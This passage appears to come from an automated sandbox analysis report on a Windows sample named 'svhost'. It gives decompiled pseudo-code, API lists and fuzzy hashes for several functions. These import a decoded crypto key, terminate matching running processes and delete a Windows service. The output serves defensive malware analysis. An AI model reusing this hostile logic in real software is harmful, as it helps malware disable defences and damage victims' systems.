				intOrPtr _v24;
				signed int _t24;
				void* _t43;
				void* _t57;
				void* _t58;
				signed int _t59;

				_t58 = __esi;
				_t57 = __edi;
				_t54 = __edx;
				_t43 = __ebx;
				_t24 =  *0xeef074; // 0x221cac15
				_v8 = _t24 ^ _t59;
				_v24 = __ecx;
				_v13 = 0;
				_t4 =  &_a4; // 0xe65558
				if((E00E579A0( *_t4) & 0x000000ff) == 0) {
					_v12 = 0;
					if(CryptStringToBinaryA(E00E57E90(), 0, 1, 0,  &_v12, 0, 0) != 0) {
						_t54 = _v12;
						_v20 = HeapAlloc(GetProcessHeap(), 0, _v12);
						if(_v20 != 0) {
							if(CryptStringToBinaryA(E00E57E90(), 0, 1, _v20,  &_v12, 0, 0) != 0) {
								_t54 = _v24;
								if(CryptImportKey( *(_v24 + 0xc), _v20, _v12, 0, 0, _v24 + 4) != 0) {
									_v13 = 1;
								}
							}
							HeapFree(GetProcessHeap(), 0, _v20);
						}
					}
				}
				return E00E89A35(_t43, _v8 ^ _t59, _t54, _t57, _t58);
			}













                                      0x00e65da0
                                      0x00e65da0
                                      0x00e65da0
                                      0x00e65da0
                                      0x00e65da6
                                      0x00e65dad
                                      0x00e65db0
                                      0x00e65db3
                                      0x00e65db7
                                      0x00e65dc4
                                      0x00e65dce
                                      0x00e65df4
                                      0x00e65df6
                                      0x00e65e09
                                      0x00e65e10
                                      0x00e65e33
                                      0x00e65e48
                                      0x00e65e57
                                      0x00e65e59
                                      0x00e65e59
                                      0x00e65e57
                                      0x00e65e6a
                                      0x00e65e6a
                                      0x00e65e10
                                      0x00e65e70
                                      0x00e65e80

                                      APIs
                                      • std::ios_base::good.LIBCPMTD ref: 00E65DBA
                                      • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00E65DEC
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E65DFC
                                      • HeapAlloc.KERNEL32(00000000), ref: 00E65E03
                                      • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00E65E2B
                                      • CryptImportKey.ADVAPI32(?,00000000,00000000,00000000,00000000,?), ref: 00E65E4F
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00E65E63
                                      • HeapFree.KERNEL32(00000000), ref: 00E65E6A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$Crypt$BinaryProcessString$AllocFreeImportstd::ios_base::good
                                      • String ID: XU$XU
                                      • API String ID: 3608890991-1099084465
                                      • Opcode ID: efddd7acaa3096fe1b760353a3da5bfea703ef289f7680116e0951d3290f7663
                                      • Instruction ID: f40daa27225d021c9f1936a332ad331e7895548abe3f1096db235b012cac3fe3
                                      • Opcode Fuzzy Hash: efddd7acaa3096fe1b760353a3da5bfea703ef289f7680116e0951d3290f7663
                                      • Instruction Fuzzy Hash: 973181B1B40208AFDB00DBA0DC5AFAFBBB9AB44700F004458F605BB2C1DB71AA05CB65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E6EA80 Relevance: 13.6, APIs: 9, Instructions: 94processCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 86%
                                      			E00E6EA80(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v16;
				signed int _v20;
				char _v21;
				char _v544;
				long _v572;
				void* _v580;
				signed char _v581;
				void* _v588;
				char _v589;
				void* _v596;
				intOrPtr _v600;
				char _v624;
				signed int _t31;
				signed int _t32;
				int _t41;
				void* _t54;
				void* _t74;
				signed int _t75;

				_t74 = __esi;
				_t73 = __edi;
				_t54 = __ebx;
				_push(0xffffffff);
				_push(0xec18b0);
				_push( *[fs:0x0]);
				_t31 =  *0xeef074; // 0x221cac15
				_t32 = _t31 ^ _t75;
				_v20 = _t32;
				_push(_t32);
				 *[fs:0x0] =  &_v16;
				_v600 = __ecx;
				_v589 = 0;
				if((E00E579A0(_a4) & 0x000000ff) != 0) {
					L8:
					__eflags = 0;
				} else {
					_v588 = CreateToolhelp32Snapshot(2, 0);
					if(_v588 == 0xffffffff) {
						goto L8;
					} else {
						E00EA1270(__edi,  &_v580, 0, 0x22c);
						_v580 = 0x22c;
						_push( &_v580);
						_t41 = Process32FirstW(_v588);
						_t81 = _t41;
						if(_t41 == 0) {
							L7:
							_t69 = _v588;
							CloseHandle(_v588);
							goto L8;
						} else {
							do {
								E00E57CD0(_t54,  &_v624, _t73, _t74, _t81,  &_v544);
								_v581 = E00E6EBF0( &_v21, _t73, _a4,  &_v624);
								E00E57B40( &_v624);
								if((_v581 & 0x000000ff) == 0) {
									goto L6;
								} else {
									_v596 = OpenProcess(1, 0, _v572);
									if(_v596 == 0) {
										goto L6;
									} else {
										TerminateProcess(_v596, 0);
										_t69 = _v596;
										CloseHandle(_v596);
									}
								}
								goto L9;
								L6:
								__eflags = Process32NextW(_v588,  &_v580);
							} while (__eflags != 0);
							goto L7;
						}
					}
				}
				L9:
				 *[fs:0x0] = _v16;
				return E00E89A35(_t54, _v20 ^ _t75, _t69, _t73, _t74);
			}





















                                      0x00e6ea80
                                      0x00e6ea80
                                      0x00e6ea80
                                      0x00e6ea83
                                      0x00e6ea85
                                      0x00e6ea90
                                      0x00e6ea97
                                      0x00e6ea9c
                                      0x00e6ea9e
                                      0x00e6eaa1
                                      0x00e6eaa5
                                      0x00e6eaab
                                      0x00e6eab3
                                      0x00e6eac6
                                      0x00e6ebcf
                                      0x00e6ebcf
                                      0x00e6eacc
                                      0x00e6ead6
                                      0x00e6eae3
                                      0x00000000
                                      0x00e6eae9
                                      0x00e6eaf7
                                      0x00e6eaff
                                      0x00e6eb0f
                                      0x00e6eb17
                                      0x00e6eb1d
                                      0x00e6eb1f
                                      0x00e6ebc2
                                      0x00e6ebc2
                                      0x00e6ebc9
                                      0x00000000
                                      0x00e6eb25
                                      0x00e6eb25
                                      0x00e6eb32
                                      0x00e6eb4a
                                      0x00e6eb56
                                      0x00e6eb64
                                      0x00000000
                                      0x00e6eb66
                                      0x00e6eb77
                                      0x00e6eb84
                                      0x00000000
                                      0x00e6eb86
                                      0x00e6eb8f
                                      0x00e6eb95
                                      0x00e6eb9c
                                      0x00e6eba2
                                      0x00e6eb84
                                      0x00000000
                                      0x00e6eba6
                                      0x00e6ebba
                                      0x00e6ebba
                                      0x00000000
                                      0x00e6eb25
                                      0x00e6eb1f
                                      0x00e6eae3
                                      0x00e6ebd1
                                      0x00e6ebd4
                                      0x00e6ebe9

                                      APIs
                                      • std::ios_base::good.LIBCPMTD ref: 00E6EABC
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E6EAD0
                                      • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 00E6EB17
                                      • task.LIBCPMTD ref: 00E6EB56
                                      • OpenProcess.KERNEL32(00000001,00000000,?,00E560D8,?,?), ref: 00E6EB71
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E6EB8F
                                      • CloseHandle.KERNEL32(00000000), ref: 00E6EB9C
                                      • Process32NextW.KERNEL32(000000FF,0000022C), ref: 00E6EBB4
                                      • CloseHandle.KERNEL32(000000FF), ref: 00E6EBC9
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32std::ios_base::goodtask
                                      • String ID:
                                      • API String ID: 211509562-0
                                      • Opcode ID: 0f048129615d9a71c5dde01efd2f9d256af9b6c4750cfd372ed7ce831b1c3754
                                      • Instruction ID: 923f35508edaed5e4e7557689395390617fe1aa616622359508321c111935a48
                                      • Opcode Fuzzy Hash: 0f048129615d9a71c5dde01efd2f9d256af9b6c4750cfd372ed7ce831b1c3754
                                      • Instruction Fuzzy Hash: 1D415C759442189FCB24DF64EC99FEEB7B4FB48700F0042E9A60AB62D1DB315A88CF51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E6EED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47serviceCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00E6EED0(intOrPtr __ecx, char _a4) {
				char _v5;
				char _v6;
				void* _v12;
				void* _v16;
				intOrPtr _v20;

				_v20 = __ecx;
				_v6 = 0;
				_t3 =  &_a4; // 0xe56039
				if((E00E579A0( *_t3) & 0x000000ff) == 0) {
					_v16 = OpenSCManagerW(0, 0, 0xf003f);
					if(_v16 != 0) {
						_v12 = OpenServiceW(_v16, E00E57A40(), 0x10020);
						if(_v12 != 0) {
							if(DeleteService(_v12) == 0) {
								_v5 = 0;
							} else {
								_v5 = 1;
							}
							_v6 = _v5;
							CloseServiceHandle(_v12);
						}
						CloseServiceHandle(_v16);
					}
				}
				return _v6;
			}








                                      0x00e6eed6
                                      0x00e6eed9
                                      0x00e6eedd
                                      0x00e6eeea
                                      0x00e6eefb
                                      0x00e6ef02
                                      0x00e6ef1c
                                      0x00e6ef23
                                      0x00e6ef31
                                      0x00e6ef39
                                      0x00e6ef33
                                      0x00e6ef33
                                      0x00e6ef33
                                      0x00e6ef40
                                      0x00e6ef47
                                      0x00e6ef47
                                      0x00e6ef51
                                      0x00e6ef51
                                      0x00e6ef02
                                      0x00e6ef5d

                                      APIs
                                      • std::ios_base::good.LIBCPMTD ref: 00E6EEE0
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00E56039,00000000,00000000,00000000,00000000,00000000,?,{8761ABBD-7F85-42EE-B272-A76179687C63}), ref: 00E6EEF5
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00010020), ref: 00E6EF16
                                      • DeleteService.ADVAPI32(00000000), ref: 00E6EF29
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00E6EF47
                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00E6EF51
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandleOpen$DeleteManagerstd::ios_base::good
                                      • String ID: 9`
                                      • API String ID: 3780257426-621162546
                                      • Opcode ID: 2528a37356bd727c6ede399f9d347416afa518848873caed3886be50206b35b6
                                      • Instruction ID: c6c1d93d24bb09aa976221fc7f645b46a705dd2b2da2029ae0a96210b0ad37ed
                                      • Opcode Fuzzy Hash: 2528a37356bd727c6ede399f9d347416afa518848873caed3886be50206b35b6
                                      • Instruction Fuzzy Hash: AF118678A48248EFC710DBA5D819BAEBF746F54341F008098E541773C1C6758549CB51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EB8FAA Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 71%
                                      			E00EB8FAA(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t69;
				void* _t73;
				void* _t74;
				void* _t78;
				intOrPtr* _t85;
				short* _t87;
				void* _t89;
				intOrPtr* _t92;
				intOrPtr* _t96;
				signed int _t114;
				void* _t115;
				intOrPtr* _t117;
				intOrPtr _t120;
				signed int* _t121;
				void* _t122;
				intOrPtr* _t124;
				signed short _t126;
				int _t128;
				void* _t129;
				void* _t132;
				signed int _t133;

				_push(__ecx);
				_push(__ecx);
				_t85 = _a4;
				_t33 = E00EB0EFC(__ecx, __edx);
				_t114 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t124 = _t3;
				_t4 = _t124 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t124 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t124 + 4; // 0x54
				_t117 = _t6;
				_v8 = _t34;
				_t92 = _t85;
				_t35 = _t85 + 0x80;
				 *_t124 = _t85;
				 *_t117 = _t35;
				if( *_t35 != 0) {
					E00EB8F3D(0xecc260, 0x16, _t117);
					_t92 =  *_t124;
					_t132 = _t132 + 0xc;
					_t114 = 0;
				}
				_push(_t124);
				if( *_t92 == _t114) {
					E00EB88AE(_t85, _t92);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t117)) == _t114) {
						E00EB89CE();
					} else {
						E00EB8935(_t92);
					}
					if( *((intOrPtr*)(_t124 + 8)) == 0) {
						_t78 = E00EB8F3D(0xecbf50, 0x40, _t124);
						_t132 = _t132 + 0xc;
						if(_t78 != 0) {
							_push(_t124);
							if( *((intOrPtr*)( *_t117)) == 0) {
								E00EB89CE();
							} else {
								E00EB8935(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t124 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t85 + 0x100;
					if( *_t85 != 0 ||  *_t38 != 0) {
						_t39 = E00EB8DFA(_t38, _t124);
					} else {
						_t39 = GetACP();
					}
					_t126 = _t39;
					if(_t126 == 0 || _t126 == 0xfde8 || IsValidCodePage(_t126 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t126;
						}
						_t120 = _a12;
						if(_t120 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t96 = _v8;
							_t15 = _t120 + 0x120; // 0xd0
							_t87 = _t15;
							 *_t87 = 0;
							_t16 = _t96 + 2; // 0x6
							_t115 = _t16;
							do {
								_t45 =  *_t96;
								_t96 = _t96 + 2;
							} while (_t45 != _v12);
							_t18 = (_t96 - _t115 >> 1) + 1; // 0x3
							_t47 = E00EAFAFC(_t87, 0x55, _v8);
							_t133 = _t132 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E00EA4980();
								asm("int3");
								_t131 = _t133;
								_t50 =  *0xeef074; // 0x221cac15
								_v52 = _t50 ^ _t133;
								_push(_t87);
								_push(_t126);
								_push(_t120);
								_t52 = E00EB0EFC(_t98, _t115);
								_t88 = _t52;
								_t121 =  *(E00EB0EFC(_t98, _t115) + 0x34c);
								_t128 = E00EB96E5(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t128, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E00EB6062(_t121, _t128,  *((intOrPtr*)(_t88 + 0x54)),  &_v252) == 0 && E00EB9817(_t128) != 0) {
										 *_t121 =  *_t121 | 0x00000004;
										_t121[2] = _t128;
										_t121[1] = _t128;
									}
								} else {
									 *_t121 =  *_t121 & _t56;
								}
								_pop(_t122);
								_pop(_t129);
								_pop(_t89);
								return E00E89A35(_t89, _v12 ^ _t131, _t115, _t122, _t129);
							} else {
								if(E00EB16D5(_t87, 0x1001, _t120, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t120 + 0x80; // 0x30
									_t87 = _t20;
									_t21 = _t120 + 0x120; // 0xd0
									if(E00EB16D5(_t21, 0x1002, _t87, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t69 = E00EBF87B(_t98);
										_t98 = _t87;
										if(_t69 != 0) {
											L31:
											_t22 = _t120 + 0x120; // 0xd0
											if(E00EB16D5(_t22, 7, _t87, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t74 = E00EBF87B(_t98);
											_t98 = _t87;
											if(_t74 == 0) {
												L32:
												_t120 = _t120 + 0x100;
												if(_t126 != 0xfde9) {
													E00EBDEDC(_t98, _t126, _t120, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t73 = E00EAFAFC(_t120, 0x10, L"utf8");
													_t133 = _t133 + 0x10;
													if(_t73 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}













































                                      0x00eb8faf
                                      0x00eb8fb0
                                      0x00eb8fb2
                                      0x00eb8fb7
                                      0x00eb8fbe
                                      0x00eb8fc0
                                      0x00eb8fc3
                                      0x00eb8fc3
                                      0x00eb8fc6
                                      0x00eb8fc6
                                      0x00eb8fcc
                                      0x00eb8fcf
                                      0x00eb8fd2
                                      0x00eb8fd2
                                      0x00eb8fd5
                                      0x00eb8fd8
                                      0x00eb8fda
                                      0x00eb8fe0
                                      0x00eb8fe2
                                      0x00eb8fe7
                                      0x00eb8ff1
                                      0x00eb8ff6
                                      0x00eb8ff8
                                      0x00eb8ffb
                                      0x00eb8ffb
                                      0x00eb8ffd
                                      0x00eb9001
                                      0x00eb904a
                                      0x00000000
                                      0x00eb9003
                                      0x00eb9008
                                      0x00eb9011
                                      0x00eb900a
                                      0x00eb900a
                                      0x00eb900a
                                      0x00eb901c
                                      0x00eb9026
                                      0x00eb902b
                                      0x00eb9030
                                      0x00eb9036
                                      0x00eb903a
                                      0x00eb9043
                                      0x00eb903c
                                      0x00eb903c
                                      0x00eb903c
                                      0x00eb904f
                                      0x00eb904f
                                      0x00eb9030
                                      0x00eb901c
                                      0x00eb9055
                                      0x00eb9191
                                      0x00eb9191
                                      0x00000000
                                      0x00eb905b
                                      0x00eb905b
                                      0x00eb9064
                                      0x00eb9075
                                      0x00eb906b
                                      0x00eb906b
                                      0x00eb906b
                                      0x00eb907c
                                      0x00eb9080
                                      0x00000000
                                      0x00eb90a4
                                      0x00eb90a4
                                      0x00eb90a9
                                      0x00eb90ab
                                      0x00eb90ab
                                      0x00eb90ad
                                      0x00eb90b2
                                      0x00eb918c
                                      0x00eb918e
                                      0x00eb9193
                                      0x00eb9197
                                      0x00eb90b8
                                      0x00eb90b8
                                      0x00eb90bb
                                      0x00eb90bb
                                      0x00eb90c3
                                      0x00eb90c6
                                      0x00eb90c6
                                      0x00eb90c9
                                      0x00eb90c9
                                      0x00eb90cc
                                      0x00eb90cf
                                      0x00eb90d9
                                      0x00eb90e3
                                      0x00eb90e8
                                      0x00eb90ed
                                      0x00eb9198
                                      0x00eb919a
                                      0x00eb919b
                                      0x00eb919c
                                      0x00eb919d
                                      0x00eb919e
                                      0x00eb919f
                                      0x00eb91a4
                                      0x00eb91a8
                                      0x00eb91b0
                                      0x00eb91b7
                                      0x00eb91ba
                                      0x00eb91bb
                                      0x00eb91bf
                                      0x00eb91c0
                                      0x00eb91c5
                                      0x00eb91cd
                                      0x00eb91dc
                                      0x00eb91e8
                                      0x00eb91f9
                                      0x00eb9201
                                      0x00eb921b
                                      0x00eb9228
                                      0x00eb922b
                                      0x00eb922e
                                      0x00eb922e
                                      0x00eb9203
                                      0x00eb9203
                                      0x00eb9205
                                      0x00eb923e
                                      0x00eb923f
                                      0x00eb9242
                                      0x00eb9249
                                      0x00eb90f3
                                      0x00eb9103
                                      0x00000000
                                      0x00eb9109
                                      0x00eb910b
                                      0x00eb910b
                                      0x00eb9117
                                      0x00eb9125
                                      0x00000000
                                      0x00eb9127
                                      0x00eb9127
                                      0x00eb912a
                                      0x00eb9130
                                      0x00eb9133
                                      0x00eb9143
                                      0x00eb9148
                                      0x00eb9156
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eb9135
                                      0x00eb9135
                                      0x00eb9138
                                      0x00eb913e
                                      0x00eb9141
                                      0x00eb9158
                                      0x00eb9158
                                      0x00eb9164
                                      0x00eb9184
                                      0x00000000
                                      0x00eb9166
                                      0x00eb9166
                                      0x00eb9170
                                      0x00eb9175
                                      0x00eb917a
                                      0x00000000
                                      0x00eb917c
                                      0x00000000
                                      0x00eb917c
                                      0x00eb917a
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eb9141
                                      0x00eb9133
                                      0x00eb9125
                                      0x00eb9103
                                      0x00eb90ed
                                      0x00eb90b2
                                      0x00eb9080

                                      APIs
                                        • Part of subcall function 00EB0EFC: GetLastError.KERNEL32(00000008,00E62ABC,00000000,00EB2C01,00E76827,00E7686D,?,00E76684,00000000,00000000), ref: 00EB0F01
                                        • Part of subcall function 00EB0EFC: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E76684,00000000,00000000), ref: 00EB0F9F
                                      • GetACP.KERNEL32(?,?,?,?,?,?,00EAE672,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00EB906B
                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00EAE672,?,?,?,00000055,?,-00000050,?,?), ref: 00EB9096
                                      • _wcschr.LIBVCRUNTIME ref: 00EB912A
                                      • _wcschr.LIBVCRUNTIME ref: 00EB9138
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00EB91F9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                      • String ID: utf8
                                      • API String ID: 4147378913-905460609
                                      • Opcode ID: f8c087b2464fe8e1761eebb9ffdb690074a8f371b9f00adaa3e533af612dc69e
                                      • Instruction ID: a1f0e1b7b9db1a8b7e313619303eb3fcf029da94eb73efdfbb93ba800912ca10
                                      • Opcode Fuzzy Hash: f8c087b2464fe8e1761eebb9ffdb690074a8f371b9f00adaa3e533af612dc69e
                                      • Instruction Fuzzy Hash: 60711671A00202AADB24AB39CC46BFB73E8EF45714F156079F649FB182EB74E941D750
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EB9736 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 94%
                                      			E00EB9736(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E00EB03BF(_t23, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}
















                                      0x00eb973b
                                      0x00eb973c
                                      0x00eb9743
                                      0x00eb97e7
                                      0x00eb9800
                                      0x00eb9806
                                      0x00eb980b
                                      0x00eb980d
                                      0x00eb980d
                                      0x00eb9813
                                      0x00eb9816
                                      0x00eb9816
                                      0x00eb9802
                                      0x00eb9802
                                      0x00000000
                                      0x00eb9802
                                      0x00eb9749
                                      0x00eb974e
                                      0x00000000
                                      0x00000000
                                      0x00eb9754
                                      0x00eb9759
                                      0x00eb975b
                                      0x00eb975b
                                      0x00eb9761
                                      0x00000000
                                      0x00000000
                                      0x00eb9766
                                      0x00eb977d
                                      0x00eb977d
                                      0x00eb9786
                                      0x00eb9788
                                      0x00000000
                                      0x00000000
                                      0x00eb978a
                                      0x00eb978f
                                      0x00eb9791
                                      0x00eb9791
                                      0x00eb9797
                                      0x00000000
                                      0x00000000
                                      0x00eb979c
                                      0x00eb97ba
                                      0x00eb97bc
                                      0x00eb97df
                                      0x00000000
                                      0x00eb97e4
                                      0x00eb97d7
                                      0x00000000
                                      0x00000000
                                      0x00eb97d9
                                      0x00000000
                                      0x00eb97d9
                                      0x00eb979e
                                      0x00eb97a6
                                      0x00000000
                                      0x00000000
                                      0x00eb97a8
                                      0x00eb97ab
                                      0x00eb97b1
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eb97b3
                                      0x00eb97b5
                                      0x00eb97b7
                                      0x00000000
                                      0x00eb97b7
                                      0x00eb9768
                                      0x00eb9770
                                      0x00000000
                                      0x00000000
                                      0x00eb9772
                                      0x00eb9775
                                      0x00eb977b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00eb977b
                                      0x00eb9781
                                      0x00eb9783
                                      0x00000000

                                      APIs
